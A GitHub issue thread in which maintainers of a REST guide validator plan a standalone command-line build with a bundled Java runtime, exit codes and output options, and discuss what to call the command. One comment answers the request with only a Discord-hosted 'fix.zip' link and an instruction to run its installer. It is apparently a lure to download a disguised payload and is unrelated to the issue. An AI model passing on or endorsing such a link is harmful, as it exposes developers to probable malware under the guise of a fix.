### ISSUE TITLE
Create a self-contained distribution

### ISSUE THREAD

**Issue by pvdbosch** [belgif/rest-guide-validator#13]
Not all users of the validator are using Maven or Java.

Create a self-contained build of the validator that can be executed from the command line that:
* doesn't require maven
* doesn't require a pre-installed Java runtime, either by:
  * bundling a Java runtime using jpackage or launch4j
    * best to make a version that doesn't require admin privileges to install
    * if possible, also automate add to PATH, e.g. https://stackoverflow.com/questions/67784565/jpackage-update-path-environment-variable
  * create a native build (quarkus/graalvm/...) => probably too much work for now

Available CLI options should be similar to the maven standalone mojo. PicoCli library could be used for argument parsing.

* exit codes: 0  = successful, 1 = unexpected error, 10=invalid OpenAPI file, 11=validation error (based on https://unix.stackexchange.com/questions/604260/best-range-for-custom-exit-code-in-linux )
* support optional parameters to specify file output location (resolved relative to execution dir) and format (JUnit XML / JSON )

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by smals-mavh** [comment]
How should we call this command?
validate is probably a bit to wide?
belgif-rest-guide-validate ?

**Comment by pvdbosch** [comment]
I'd propose `belgif-validate-openapi`
